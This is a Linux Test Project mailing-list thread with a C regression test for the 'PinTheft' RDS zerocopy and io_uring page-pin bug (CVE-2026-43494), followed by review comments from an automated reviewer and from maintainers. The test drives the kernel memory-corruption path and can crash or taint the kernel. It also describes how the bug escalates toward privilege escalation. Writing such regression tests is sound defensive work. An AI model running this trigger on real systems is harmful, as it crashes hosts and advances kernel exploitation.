cve-2026-46300 xfrm02
diff --git a/testcases/kernel/syscalls/io_uring/pintheft.c b/testcases/kernel/syscalls/io_uring/pintheft.c
new file mode 100644
index 000000000..6601c87ca
--- /dev/null
+++ b/testcases/kernel/syscalls/io_uring/pintheft.c
@@ -0,0 +1,424 @@
+// SPDX-License-Identifier: GPL-2.0-or-later
+/*
+ * Copyright (C) 2026 SUSE LLC Sebastian Chlad <sebastian.chlad@suse.com>
+ */
+
+/*\
+ * CVE-2026-43494
+ *
+ * Test for PinTheft, fixed by:
+ * e17492979319 ("net/rds: reset op_nents when zerocopy page pin fails").
+ *
+ * The bug is in the RDS zerocopy send error path. When RDS pins user pages for
+ * zerocopy send and a later page faults, the error cleanup can drop references
+ * for pages that are later released again during RDS message cleanup. This
+ * corrupts page reference accounting.
+ *
+ * The public exploit combines this RDS reference-counting bug with io_uring
+ * fixed buffers and cloned buffer registrations to turn stale page references
+ * into a page-cache overwrite and local privilege escalation.
+ *
+ * This test does not attempt privilege escalation. It triggers the underlying
+ * RDS zerocopy failure path by sending GUP_PIN_COUNTING_BIAS (1024) two-page
+ * iovecs where the first page is registered as an io_uring fixed buffer and
+ * the second page is PROT_NONE. Each failing send steals one FOLL_PIN
+ * reference; after 1024 sends the io_uring-held page pin is exhausted.
+ * Unregistering the fixed buffers on a vulnerable kernel then tries to unpin
+ * a page with no remaining FOLL_PIN references, triggering a kernel WARN or
+ * BUG_ON and tainting the kernel.
+ *
+ * Vulnerable kernels may crash, taint, panic, or hang during sendmsg() or
+ * subsequent cleanup. Run only on disposable systems.
+ *
+ * Reproducer is based on:
+ * https://github.com/v12-security/pocs/tree/main/pintheft
+ */
+
+#include <errno.h>
+#include <netinet/in.h>
+#include <stdint.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/uio.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+#include <linux/rds.h>
+
+/* Fallback for older userspace headers (e.g. openSUSE Leap 42.2). */
+#ifndef RDS_CMSG_ZCOPY_COOKIE
+#define RDS_CMSG_ZCOPY_COOKIE 12
+#endif
+
+#include "tst_test.h"
+#include "lapi/io_uring.h"
+#include "lapi/socket.h"
+
+#define CLEANUP_WAIT_SECS 30
+#define RSS_CHECK_CHILDREN 8
+#define RSS_CHECK_SIZE (16 * 1024 * 1024)
+
+/*
+ * io_uring pins fixed-buffer pages with FOLL_PIN, which adds
+ * GUP_PIN_COUNTING_BIAS (1024) to the page reference count. Each failing
+ * RDS zerocopy send steals one of those references via the double-drop bug.
+ * We need exactly 1024 iterations to fully drain the FOLL_PIN counter.
+ */
+#define GUP_PIN_COUNTING_BIAS 1024
+
+static int ring_fd1 = -1;
+static int ring_fd2 = -1;
+static int rds_fd = -1;
+static int buffer_registered;
+static int buffer_cloned;
+static long page_size;
+static void *mapped_pages;
+
+static void cleanup(void);
+
+/* Inspired by liburing's io_uring_clone_buffers(), but using raw ring fds. */
+static int clone_buffers(int dst_fd, int src_fd)
+{
+ struct io_uring_clone_buffers clone;
+
+ memset(&clone, 0, sizeof(clone));
+ clone.src_fd = src_fd;
+
+ return io_uring_register(dst_fd, IORING_REGISTER_CLONE_BUFFERS,
+ &clone, 1);
+}
+
+static void setup(void)
+{
+ struct io_uring_params params = {};
+ struct iovec fixed_iov;
+ int val;
+
+ page_size = SAFE_SYSCONF(_SC_PAGESIZE);
+ io_uring_setup_supported_by_kernel();
+
+ /*
+ * The exploit primitive keeps one fixed-buffer registration alive and
+ * clones it to another ring.
+ */
+ ring_fd1 = io_uring_setup(1, ¶ms);
+ if (ring_fd1 < 0)
+ tst_brk(TBROK | TERRNO, "io_uring_setup() failed for first ring");
+
+ memset(¶ms, 0, sizeof(params));
+
+ ring_fd2 = io_uring_setup(1, ¶ms);
+ if (ring_fd2 < 0)
+ tst_brk(TBROK | TERRNO, "io_uring_setup() failed for second ring");
+
+ rds_fd = socket(AF_RDS, SOCK_SEQPACKET | SOCK_CLOEXEC, 0);
+ if (rds_fd < 0) {
+ if (errno == EAFNOSUPPORT || errno == ESOCKTNOSUPPORT ||
+ errno == EPROTONOSUPPORT || errno == ENOPROTOOPT)
+ tst_brk(TCONF | TERRNO, "RDS is not available");
+
+ tst_brk(TBROK | TERRNO, "socket(AF_RDS) failed");
+ }
+
+ /* PinTheft uses the RDS TCP transport, so base RDS is not enough. */
+ val = RDS_TRANS_TCP;
+ TEST(setsockopt(rds_fd, SOL_RDS, SO_RDS_TRANSPORT, &val, sizeof(val)));
+
+ if (TST_RET) {
+ if (TST_ERR == ENOPROTOOPT || TST_ERR == EINVAL)
+ tst_brk(TCONF | TERRNO, "RDS TCP transport is not available");
+
+ tst_brk(TBROK | TERRNO, "setsockopt(SO_RDS_TRANSPORT) failed");
+ }
+
+ /*
+ * Allocate two adjacent pages: the first one will be pinned as an
+ * io_uring fixed buffer, and the second one will be made inaccessible.
+ */
+ mapped_pages = SAFE_MMAP(NULL, 2 * page_size, PROT_READ | PROT_WRITE,
+ MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+ memset(mapped_pages, 0xa5, page_size);
+
+ /*
+ * RDS should successfully pin the first page, then fault on the second.
+ * That fault drives the buggy zerocopy error cleanup path.
+ */
+ SAFE_MPROTECT((char *)mapped_pages + page_size, page_size, PROT_NONE);
+
+ fixed_iov.iov_base = mapped_pages;
+ fixed_iov.iov_len = page_size;
+
+ /*
+ * Register only the first page as an io_uring fixed buffer. This creates
+ * the long-term page pin whose reference accounting the RDS bug damages.
+ */
+ if (io_uring_register(ring_fd1, IORING_REGISTER_BUFFERS, &fixed_iov, 1))
+ tst_brk(TBROK | TERRNO, "IORING_REGISTER_BUFFERS failed");
+
+ buffer_registered = 1;
+
+ /*
+ * Clone the fixed buffer registration into the second ring, matching the
+ * public reproducer's lifetime pattern without performing the later
+ * page-cache overwrite stage.
+ */
+ if (clone_buffers(ring_fd2, ring_fd1)) {
+ if (errno == EINVAL || errno == EOPNOTSUPP)
+ tst_brk(TCONF | TERRNO, "IORING_REGISTER_CLONE_BUFFERS is not supported");
+
+ tst_brk(TBROK | TERRNO, "IORING_REGISTER_CLONE_BUFFERS failed");
+ }
+
+ buffer_cloned = 1;
+}
+
+static void trigger(void)
+{
+ /*
+ * Derive RDS ports from the process ID so concurrent test instances
+ * do not collide in the RDS port namespace.
+ */
+ const uint16_t src_port = (uint16_t)(20000 + (getpid() % 20000));
+ struct sockaddr_in bind_addr = {
+ .sin_family = AF_INET,
+ .sin_addr.s_addr = htonl(INADDR_LOOPBACK),
+ .sin_port = htons(src_port),
+ };
+ struct sockaddr_in dst_addr = {
+ .sin_family = AF_INET,
+ .sin_addr.s_addr = htonl(INADDR_LOOPBACK),
+ .sin_port = htons(src_port + 1),
+ };
+ char control[CMSG_SPACE(sizeof(uint32_t))];
+ struct cmsghdr *cmsg;
+ struct iovec iov = {
+ .iov_base = mapped_pages,
+ .iov_len = 2 * page_size,
+ };
+ struct msghdr msg = {
+ .msg_name = &dst_addr,
+ .msg_namelen = sizeof(dst_addr),
+ .msg_iov = &iov,
+ .msg_iovlen = 1,
+ .msg_control = control,
+ .msg_controllen = sizeof(control),
+ };
+ int ret;
+ int val;
+ int i, efaults, first_bad_errno = 0;
+
+ /* Mirror the public PoC trigger: RDS zerocopy over TCP. */
+ val = 1;
+ if (setsockopt(rds_fd, SOL_SOCKET, SO_ZEROCOPY, &val, sizeof(val))) {
+ if (errno == ENOPROTOOPT || errno == EINVAL)
+ tst_brk(TCONF | TERRNO, "SO_ZEROCOPY not supported on RDS sockets");
+ tst_brk(TBROK | TERRNO, "setsockopt(SO_ZEROCOPY) failed");
+ }
+
+ val = 2 * page_size * 4;
+ SAFE_SETSOCKOPT(rds_fd, SOL_SOCKET, SO_SNDBUF, &val, sizeof(val));
+
+ /*
+ * Bind to one loopback RDS port and send to another unbound local port.
+ * The sends are expected to fail before any useful delivery; the faulting
+ * iovec is the interesting part.
+ */
+ SAFE_BIND(rds_fd, (struct sockaddr *)&bind_addr, sizeof(bind_addr));
+
+ memset(control, 0, sizeof(control));
+ cmsg = (struct cmsghdr *)control;
+ cmsg->cmsg_level = SOL_RDS;
+ cmsg->cmsg_type = RDS_CMSG_ZCOPY_COOKIE;
+ cmsg->cmsg_len = CMSG_LEN(sizeof(uint32_t));
+
+ /*
+ * Repeatedly attempt a two-page zerocopy send where page 0 is pinnable
+ * and page 1 is PROT_NONE. Each attempt should:
+ * 1. Pin page 0 successfully.
+ * 2. Fault on page 1, so RDS error path drops page 0's reference.
+ * 3. RDS message cleanup drops page 0's reference again (the bug).
+ *
+ * On a vulnerable kernel this steals one FOLL_PIN reference per
+ * iteration; GUP_PIN_COUNTING_BIAS iterations drain the counter to zero.
+ * Unregistering the io_uring fixed buffer then tries to unpin a page
+ * with no remaining FOLL_PIN references, causing a kernel WARN/BUG_ON
+ * and taint.
+ *
+ * EFAULT is the expected error because page 1 is PROT_NONE. Other
+ * errors do not count as successful pin-theft iterations.
+ *
+ * Vulnerable kernels may crash, taint, panic, or hang here or during
+ * cleanup() below.
+ */
+ for (i = 0, efaults = 0; i < GUP_PIN_COUNTING_BIAS; i++) {
+ /* rds_cmsg_zcopy() in net/rds/send.c */
+ *(uint32_t *)CMSG_DATA(cmsg) = (uint32_t)i;
+
+ ret = sendmsg(rds_fd, &msg, MSG_ZEROCOPY | MSG_DONTWAIT);
+ if (ret >= 0)
+ tst_brk(TBROK, "sendmsg() unexpectedly succeeded at iter %d", i);
+
+ if (errno == EFAULT)
+ efaults++;
+ else if (!first_bad_errno)
+ first_bad_errno = errno;
+ }
+
+ if (first_bad_errno) {
+ tst_res(TINFO, "sendmsg() returned unexpected errno %d (%s) on at least one iteration",
+ first_bad_errno, tst_strerrno(first_bad_errno));
+ }
+
+ tst_res(TINFO, "Completed %d/%d sendmsg() attempts with EFAULT",
+ efaults, GUP_PIN_COUNTING_BIAS);
+
+ if (efaults == 0)
+ tst_brk(TCONF, "sendmsg() never returned EFAULT - GUP pin path not exercised");
+
+ if (efaults < GUP_PIN_COUNTING_BIAS)
+ tst_res(TWARN, "Only %d/%d sends returned EFAULT - FOLL_PIN counter may not be fully drained",
+ efaults, GUP_PIN_COUNTING_BIAS);
+
+ /*
+ * Unregistering fixed buffers on a vulnerable kernel triggers a
+ * double-unpin: io_uring tries to release references that the RDS bug
+ * already dropped, which may produce a kernel WARN or BUG_ON and taint.
+ */
+ cleanup();
+}
+
+static void poke_rss_accounting(void)
+{
+ char *mem;
+
+ mem = SAFE_MMAP(NULL, RSS_CHECK_SIZE, PROT_READ | PROT_WRITE,
+ MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+ memset(mem, 0x5a, RSS_CHECK_SIZE);
+ SAFE_MUNMAP(mem, RSS_CHECK_SIZE);
+}
+
+static void run(void)
+{
+ pid_t pid;
+ int status;
+ int i;
+
+ /*
+ * Run the dangerous part in a child so that process teardown can expose
+ * delayed RSS/page-accounting damage before the parent reports TPASS.
+ */
+ pid = SAFE_FORK();
+ if (!pid) {
+ trigger();
+ exit(0);
+ }
+
+ SAFE_WAITPID(pid, &status, 0);
+ if (!WIFEXITED(status) || WEXITSTATUS(status))
+ return;
+
+ /*
+ * The visible failure can be delayed until another mm is torn down.
+ * Create short-lived children that dirty and release anonymous memory to
+ * encourage RSS accounting checks before the parent reports success.
+ */
+ for (i = 0; i < RSS_CHECK_CHILDREN; i++) {
+ pid = SAFE_FORK();
+ if (!pid) {
+ poke_rss_accounting();
+ exit(0);
+ }
+
+ SAFE_WAITPID(pid, &status, 0);
+
+ if (tst_taint_check()) {
+ tst_res(TFAIL, "Kernel is vulnerable: tainted during RSS accounting checks");
+ return;
+ }
+
+ if (!WIFEXITED(status) || WEXITSTATUS(status))
+ return;
+ }
+
+ /*
+ * RDS/page cleanup can run asynchronously after userspace returns from
+ * sendmsg() and after file descriptors are closed. Wait before declaring
+ * that the kernel merely "seems" to have survived.
+ */
+ for (i = 0; i < CLEANUP_WAIT_SECS; i++) {
+ sleep(1);
+
+ if (tst_taint_check()) {
+ tst_res(TFAIL, "Kernel is vulnerable: tainted during RDS zerocopy cleanup");
+ return;
+ }
+ }
+
+ tst_res(TPASS, "Kernel seems to have survived RDS zerocopy cleanup");
+}
+
+static void cleanup(void)
+{
+ /*
+ * Unregister the clone first, then the source registration.
+ * Order matters: on a vulnerable kernel, unregistering ring_fd1
+ * (the original) after the FOLL_PIN references have been drained
+ * is what triggers the double-unpin WARN/BUG_ON.
+ */
+ if (buffer_cloned) {
+ io_uring_register(ring_fd2, IORING_UNREGISTER_BUFFERS, NULL, 0);
+ buffer_cloned = 0;
+ }
+
+ if (buffer_registered) {
+ io_uring_register(ring_fd1, IORING_UNREGISTER_BUFFERS, NULL, 0);
+ buffer_registered = 0;
+ }
+
+ if (ring_fd2 >= 0) {
+ SAFE_CLOSE(ring_fd2);
+ ring_fd2 = -1;
+ }
+
+ if (ring_fd1 >= 0) {
+ SAFE_CLOSE(ring_fd1);
+ ring_fd1 = -1;
+ }
+
+ if (rds_fd >= 0) {
+ SAFE_CLOSE(rds_fd);
+ rds_fd = -1;
+ }
+
+ if (mapped_pages) {
+ SAFE_MUNMAP(mapped_pages, 2 * page_size);
+ mapped_pages = NULL;
+ }
+}
+
+static struct tst_test test = {
+ .test_all = run,
+ .setup = setup,
+ .cleanup = cleanup,
+ .timeout = 60,
+ .forks_child = 1,
+ .taint_check = TST_TAINT_W | TST_TAINT_D,
+ .needs_kconfigs = (const char *[]) {
+ "CONFIG_RDS",
+ "CONFIG_RDS_TCP",
+ "CONFIG_IO_URING",
+ NULL
+ },
+ .save_restore = (const struct tst_path_val[]) {
+ {"/proc/sys/kernel/io_uring_disabled", "0",
+ TST_SR_SKIP_MISSING | TST_SR_TCONF_RO},
+ {}
+ },
+ .tags = (const struct tst_tag[]) {
+ {"linux-git", "e17492979319"},
+ {"CVE", "2026-43494"},
+ {}
+ }
+};
--
2.51.0
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply related [flat|nested] 19+ messages in thread
* Re: [LTP] io_uring/pintheft: Add CVE-2026-43494 regression test
2026-05-23 16:57 ` [LTP] [PATCH v4] " Sebastian Chlad
@ 2026-05-23 18:07 ` linuxtestproject.agent
2026-05-24 18:16 ` [LTP] [PATCH v4] " Petr Vorel
2026-05-28 16:36 ` Martin Doucha
2 siblings, 0 replies; 19+ messages in thread
From: linuxtestproject.agent @ 2026-05-23 18:07 UTC (permalink / raw)
To: Sebastian Chlad; +Cc: ltp
Hi Sebastian,
On Sat, 23 May 2026 18:57:18 +0200, Sebastian Chlad wrote:
> io_uring/pintheft: Add CVE-2026-43494 regression test
[...]
> +#ifndef HAVE_STRUCT_IO_URING_CLONE_BUFFERS
> +struct io_uring_clone_buffers {
> + uint32_t src_fd;
> + uint32_t flags;
> + uint32_t pad[6];
> +};
> +#endif
The fallback struct doesn't match the upstream kernel definition
(include/uapi/linux/io_uring.h). The kernel has:
struct io_uring_clone_buffers {
__u32 src_fd;
__u32 flags;
__u32 src_off;
__u32 dst_off;
__u32 nr;
__u32 pad[3];
};
Total size is the same (8 × u32 = 32 bytes), so the test happens to
work correctly because you zero the whole struct and only set src_fd.
But the lapi header is wrong: future users who try to set src_off,
dst_off, or nr will write into pad[] instead of the real fields. Fix
the fallback to match the kernel layout.
[...]
> + for (i = 0, efaults = 0; i < GUP_PIN_COUNTING_BIAS; i++) {
[...]
> + ret = sendmsg(rds_fd, &msg, MSG_ZEROCOPY | MSG_DONTWAIT);
> + if (ret >= 0)
> + tst_brk(TBROK, "sendmsg() unexpectedly succeeded at iter %d", i);
The RDS socket is opened with SOCK_CLOEXEC but no O_CLOEXEC is set
on the io_uring ring fds (ring_fd1, ring_fd2). Both rings are
therefore inherited by the fork()ed child. trigger() -> cleanup()
unregisters buffers from the *shared* io_uring instances before the
child exits, so the parent's cleanup() hits IORING_UNREGISTER_BUFFERS
on already-unregistered rings. The return value of io_uring_register()
in cleanup() is silently ignored, so this doesn't crash, but it means
the "double-unpin WARN/BUG_ON" can fire in the child's cleanup pass
before the parent even gets to check taint. Consider opening the ring
fds with O_CLOEXEC so the child only operates on the rds socket, or
document the intentional sharing explicitly.
[...]
Summary: the struct io_uring_clone_buffers fallback definition must be
corrected to match the kernel layout before merging.
---
Note:
Our agent completed the review of the patch. The agent can sometimes
produce false positives although often its findings are genuine. If you
find issues with the review, please comment this email or ignore the
suggestions.
Regards,
LTP AI Reviewer
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply [flat|nested] 19+ messages in thread
* Re: [LTP] [PATCH v4] io_uring/pintheft: Add CVE-2026-43494 regression test
2026-05-23 16:57 ` [LTP] [PATCH v4] " Sebastian Chlad
2026-05-23 18:07 ` [LTP] " linuxtestproject.agent
@ 2026-05-24 18:16 ` Petr Vorel
2026-05-28 16:45 ` Martin Doucha
2026-05-28 16:36 ` Martin Doucha
2 siblings, 1 reply; 19+ messages in thread
From: Petr Vorel @ 2026-05-24 18:16 UTC (permalink / raw)
To: Sebastian Chlad; +Cc: Sebastian Chlad, ltp
Hi Sebastian,
> Test for PinTheft (CVE-2026-43494), fixed by:
> e17492979319 ("net/rds: reset op_nents when zerocopy page pin fails")
Thanks you!
> The bug is in the RDS zerocopy send error path: when pinning user pages
> for zerocopy send fails partway through, the error cleanup drops a page
> reference that the RDS message cleanup will drop again. Combined with
> io_uring fixed buffer registrations, this double-drop drains the
> FOLL_PIN counter and causes a page-cache overwrite exploitable for local
> privilege escalation (PinTheft).
...
> +static void setup(void)
> +{
> + struct io_uring_params params = {};
> + struct iovec fixed_iov;
> + int val;
> +
> + page_size = SAFE_SYSCONF(_SC_PAGESIZE);
> + io_uring_setup_supported_by_kernel();
> +
> + /*
> + * The exploit primitive keeps one fixed-buffer registration alive and
> + * clones it to another ring.
> + */
> + ring_fd1 = io_uring_setup(1, ¶ms);
> + if (ring_fd1 < 0)
> + tst_brk(TBROK | TERRNO, "io_uring_setup() failed for first ring");
> +
> + memset(¶ms, 0, sizeof(params));
> +
> + ring_fd2 = io_uring_setup(1, ¶ms);
> + if (ring_fd2 < 0)
> + tst_brk(TBROK | TERRNO, "io_uring_setup() failed for second ring");
> +
> + rds_fd = socket(AF_RDS, SOCK_SEQPACKET | SOCK_CLOEXEC, 0);
> + if (rds_fd < 0) {
> + if (errno == EAFNOSUPPORT || errno == ESOCKTNOSUPPORT ||
> + errno == EPROTONOSUPPORT || errno == ENOPROTOOPT)
> + tst_brk(TCONF | TERRNO, "RDS is not available");
> +
> + tst_brk(TBROK | TERRNO, "socket(AF_RDS) failed");
Just a quick Sunday evening comment (not yet looking into the reproducer itself).
I wonder if we need this complicated check when we already have kconfig based
checks at the end. Could we just simply use SAFE_SOCKET() here? Or have you
encountered problems with older kernels?
And I haven't found any sysctl check (it's just a kernel module), which would be
then part of lib/tst_kconfig.c.
> + }
> +
> + /* PinTheft uses the RDS TCP transport, so base RDS is not enough. */
> + val = RDS_TRANS_TCP;
> + TEST(setsockopt(rds_fd, SOL_RDS, SO_RDS_TRANSPORT, &val, sizeof(val)));
> +
> + if (TST_RET) {
> + if (TST_ERR == ENOPROTOOPT || TST_ERR == EINVAL)
> + tst_brk(TCONF | TERRNO, "RDS TCP transport is not available");
> +
> + tst_brk(TBROK | TERRNO, "setsockopt(SO_RDS_TRANSPORT) failed");
And the same here just SAFE_SETSOCKOPT() ?
> + }
...
> + /*
> + * Register only the first page as an io_uring fixed buffer. This creates
> + * the long-term page pin whose reference accounting the RDS bug damages.
> + */
> + if (io_uring_register(ring_fd1, IORING_REGISTER_BUFFERS, &fixed_iov, 1))
> + tst_brk(TBROK | TERRNO, "IORING_REGISTER_BUFFERS failed");
> +
> + buffer_registered = 1;
> +
> + /*
> + * Clone the fixed buffer registration into the second ring, matching the
> + * public reproducer's lifetime pattern without performing the later
> + * page-cache overwrite stage.
> + */
> + if (clone_buffers(ring_fd2, ring_fd1)) {
> + if (errno == EINVAL || errno == EOPNOTSUPP)
> + tst_brk(TCONF | TERRNO, "IORING_REGISTER_CLONE_BUFFERS is not supported");
Also here do we need it? IMHO CONFIG_IO_URING should be enough.
And if errno is really needed, it'd IMHO be better to be in handled in
clone_buffers(), not separately.
> +
> + tst_brk(TBROK | TERRNO, "IORING_REGISTER_CLONE_BUFFERS failed");
> + }
...
> + /* Mirror the public PoC trigger: RDS zerocopy over TCP. */
> + val = 1;
> + if (setsockopt(rds_fd, SOL_SOCKET, SO_ZEROCOPY, &val, sizeof(val))) {
> + if (errno == ENOPROTOOPT || errno == EINVAL)
> + tst_brk(TCONF | TERRNO, "SO_ZEROCOPY not supported on RDS sockets");
And here I'd also simplify with SAFE_SETSOCKOPT().
> + tst_brk(TBROK | TERRNO, "setsockopt(SO_ZEROCOPY) failed");
> + }
...
> +static struct tst_test test = {
> + .test_all = run,
> + .setup = setup,
> + .cleanup = cleanup,
> + .timeout = 60,
> + .forks_child = 1,
> + .taint_check = TST_TAINT_W | TST_TAINT_D,
> + .needs_kconfigs = (const char *[]) {
> + "CONFIG_RDS",
> + "CONFIG_RDS_TCP",
CONFIG_RDS_TCP implies CONFIG_RDS.
Kind regards,
Petr
> + "CONFIG_IO_URING",
> + NULL
> + },
> + .save_restore = (const struct tst_path_val[]) {
> + {"/proc/sys/kernel/io_uring_disabled", "0",
> + TST_SR_SKIP_MISSING | TST_SR_TCONF_RO},
> + {}
> + },
> + .tags = (const struct tst_tag[]) {
> + {"linux-git", "e17492979319"},
> + {"CVE", "2026-43494"},
> + {}
> + }
> +};
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply [flat|nested] 19+ messages in thread
* Re: [LTP] io_uring/pintheft: Add CVE-2026-43494 regression test
2026-05-23 11:19 ` [LTP] " linuxtestproject.agent
@ 2026-05-25 9:36 ` Cyril Hrubis
2026-05-29 10:18 ` Andrea Cervesato via ltp
0 siblings, 1 reply; 19+ messages in thread
From: Cyril Hrubis @ 2026-05-25 9:36 UTC (permalink / raw)
To: linuxtestproject.agent; +Cc: ltp
Hi!
> The commit author address (sebastianchlad@gmail.com) does not match the
> Signed-off-by address (sebastian.chlad@suse.com). Either add a .mailmap
> entry or re-send with a consistent identity.
>
> > diff --git a/include/lapi/io_uring.h b/include/lapi/io_uring.h
> > [...]
> > +#ifndef IORING_REGISTER_CLONE_BUFFERS
> > +# define IORING_REGISTER_CLONE_BUFFERS 30
> > +#endif
>
> Use `#define` without the extra space after `#`. All other fallback
> defines in this file use `#define`, not `# define`.
This one is actually wrong. For historical reasons macros are indented
with spaces after the hash.
--
Cyril Hrubis
chrubis@suse.cz
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply [flat|nested] 19+ messages in thread
* Re: [LTP] [PATCH v4] io_uring/pintheft: Add CVE-2026-43494 regression test
2026-05-23 16:57 ` [LTP] [PATCH v4] " Sebastian Chlad
2026-05-23 18:07 ` [LTP] " linuxtestproject.agent
2026-05-24 18:16 ` [LTP] [PATCH v4] " Petr Vorel
@ 2026-05-28 16:36 ` Martin Doucha
2026-06-04 16:38 ` [LTP] [PATCH v5 1/2] lapi: Add io_uring_clone_buffers and RDS_CMSG_ZCOPY_COOKIE fallbacks Sebastian Chlad
2 siblings, 1 reply; 19+ messages in thread
From: Martin Doucha @ 2026-05-28 16:36 UTC (permalink / raw)
To: Sebastian Chlad, ltp; +Cc: Sebastian Chlad
Hi,
some suggestions below.
On 5/23/26 18:57, Sebastian Chlad wrote:
> Test for PinTheft (CVE-2026-43494), fixed by:
> e17492979319 ("net/rds: reset op_nents when zerocopy page pin fails")
>
> The bug is in the RDS zerocopy send error path: when pinning user pages
> for zerocopy send fails partway through, the error cleanup drops a page
> reference that the RDS message cleanup will drop again. Combined with
> io_uring fixed buffer registrations, this double-drop drains the
> FOLL_PIN counter and causes a page-cache overwrite exploitable for local
> privilege escalation (PinTheft).
>
> Signed-off-by: Sebastian Chlad <sebastian.chlad@suse.com>
> ---
>
> v4: (fixing pointers listed by AI LTP)
> - Fix double blank line
> - Correct HAVE_STRUCT_IO_URING_CLONE_BUFFERS
>
> configure.ac | 1 +
> include/lapi/io_uring.h | 14 +
> runtest/cve | 1 +
> testcases/kernel/syscalls/io_uring/pintheft.c | 424 ++++++++++++++++++
> 4 files changed, 440 insertions(+)
> create mode 100644 testcases/kernel/syscalls/io_uring/pintheft.c
>
> diff --git a/configure.ac b/configure.ac
> index 0653d7793..3a1283ac3 100644
> --- a/configure.ac
> +++ b/configure.ac
> @@ -255,6 +255,7 @@ AC_CHECK_TYPES([struct __kernel_old_timeval, struct __kernel_old_timespec, struc
> struct __kernel_old_itimerval],,,[#include <sys/socket.h>])
>
> AC_CHECK_TYPES([struct futex_waitv],,,[#include <linux/futex.h>])
> +AC_CHECK_TYPES([struct io_uring_clone_buffers],,,[#include <linux/io_uring.h>])
> AC_CHECK_TYPES([struct mount_attr],,,[
> #ifdef HAVE_MOUNT_SETATTR
> # include <sys/mount.h>
> diff --git a/include/lapi/io_uring.h b/include/lapi/io_uring.h
> index 2026863a2..5c6f9a785 100644
> --- a/include/lapi/io_uring.h
> +++ b/include/lapi/io_uring.h
It'd be better to submit LAPI changes as a separate commit.
> @@ -265,6 +265,20 @@ struct io_uring_probe {
>
> #endif /* IOSQE_FIXED_FILE */
>
> +/* linux/io_uring.h: IORING_REGISTER_CLONE_BUFFERS = 30 */
> +#ifndef IORING_REGISTER_CLONE_BUFFERS
> +#define IORING_REGISTER_CLONE_BUFFERS 30
> +#endif
> +
> +/* Argument for IORING_REGISTER_CLONE_BUFFERS */
> +#ifndef HAVE_STRUCT_IO_URING_CLONE_BUFFERS
> +struct io_uring_clone_buffers {
> + uint32_t src_fd;
> + uint32_t flags;
> + uint32_t pad[6];
> +};
> +#endif
> +
> #ifndef IOSQE_IO_HADRLINK
> /* like LINK, but stronger */
> #define IOSQE_IO_HARDLINK_BIT 3
> diff --git a/runtest/cve b/runtest/cve
> index 74ee8e9ba..32a0f237d 100644
> --- a/runtest/cve
> +++ b/runtest/cve
> @@ -95,4 +95,5 @@ cve-2025-38236 cve-2025-38236
> cve-2025-21756 cve-2025-21756
> cve-2026-31431 af_alg08
> cve-2026-43284 xfrm01
> +cve-2026-43494 pintheft
> cve-2026-46300 xfrm02
> diff --git a/testcases/kernel/syscalls/io_uring/pintheft.c b/testcases/kernel/syscalls/io_uring/pintheft.c
> new file mode 100644
> index 000000000..6601c87ca
> --- /dev/null
> +++ b/testcases/kernel/syscalls/io_uring/pintheft.c
I recommend renaming the file to io_uring04.c.
> @@ -0,0 +1,424 @@
> +// SPDX-License-Identifier: GPL-2.0-or-later
> +/*
> + * Copyright (C) 2026 SUSE LLC Sebastian Chlad <sebastian.chlad@suse.com>
> + */
> +
> +/*\
> + * CVE-2026-43494
> + *
> + * Test for PinTheft, fixed by:
> + * e17492979319 ("net/rds: reset op_nents when zerocopy page pin fails").
> + *
> + * The bug is in the RDS zerocopy send error path. When RDS pins user pages for
> + * zerocopy send and a later page faults, the error cleanup can drop references
> + * for pages that are later released again during RDS message cleanup. This
> + * corrupts page reference accounting.
> + *
> + * The public exploit combines this RDS reference-counting bug with io_uring
> + * fixed buffers and cloned buffer registrations to turn stale page references
> + * into a page-cache overwrite and local privilege escalation.
> + *
> + * This test does not attempt privilege escalation. It triggers the underlying
> + * RDS zerocopy failure path by sending GUP_PIN_COUNTING_BIAS (1024) two-page
> + * iovecs where the first page is registered as an io_uring fixed buffer and
> + * the second page is PROT_NONE. Each failing send steals one FOLL_PIN
> + * reference; after 1024 sends the io_uring-held page pin is exhausted.
> + * Unregistering the fixed buffers on a vulnerable kernel then tries to unpin
> + * a page with no remaining FOLL_PIN references, triggering a kernel WARN or
> + * BUG_ON and tainting the kernel.
> + *
> + * Vulnerable kernels may crash, taint, panic, or hang during sendmsg() or
> + * subsequent cleanup. Run only on disposable systems.
> + *
> + * Reproducer is based on:
> + * https://github.com/v12-security/pocs/tree/main/pintheft
> + */
> +
> +#include <errno.h>
> +#include <netinet/in.h>
> +#include <stdint.h>
> +#include <stdlib.h>
> +#include <string.h>
> +#include <sys/mman.h>
> +#include <sys/socket.h>
> +#include <sys/uio.h>
> +#include <sys/wait.h>
> +#include <unistd.h>
Most of these header files are included by tst_test.h. You don't need to
include them explicitly.
> +
> +#include <linux/rds.h>
> +
> +/* Fallback for older userspace headers (e.g. openSUSE Leap 42.2). */
> +#ifndef RDS_CMSG_ZCOPY_COOKIE
> +#define RDS_CMSG_ZCOPY_COOKIE 12
> +#endif
It'd be better to have this fallback #define in LAPI.
> +
> +#include "tst_test.h"
> +#include "lapi/io_uring.h"
> +#include "lapi/socket.h"
> +
> +#define CLEANUP_WAIT_SECS 30
Isn't 30 seconds a bit too much?
> +#define RSS_CHECK_CHILDREN 8
> +#define RSS_CHECK_SIZE (16 * 1024 * 1024)
> +
> +/*
> + * io_uring pins fixed-buffer pages with FOLL_PIN, which adds
> + * GUP_PIN_COUNTING_BIAS (1024) to the page reference count. Each failing
> + * RDS zerocopy send steals one of those references via the double-drop bug.
> + * We need exactly 1024 iterations to fully drain the FOLL_PIN counter.
> + */
> +#define GUP_PIN_COUNTING_BIAS 1024
> +
> +static int ring_fd1 = -1;
> +static int ring_fd2 = -1;
> +static int rds_fd = -1;
> +static int buffer_registered;
> +static int buffer_cloned;
> +static long page_size;
> +static void *mapped_pages;
> +
> +static void cleanup(void);
> +
> +/* Inspired by liburing's io_uring_clone_buffers(), but using raw ring fds. */
> +static int clone_buffers(int dst_fd, int src_fd)
> +{
> + struct io_uring_clone_buffers clone;
> +
> + memset(&clone, 0, sizeof(clone));
> + clone.src_fd = src_fd;
> +
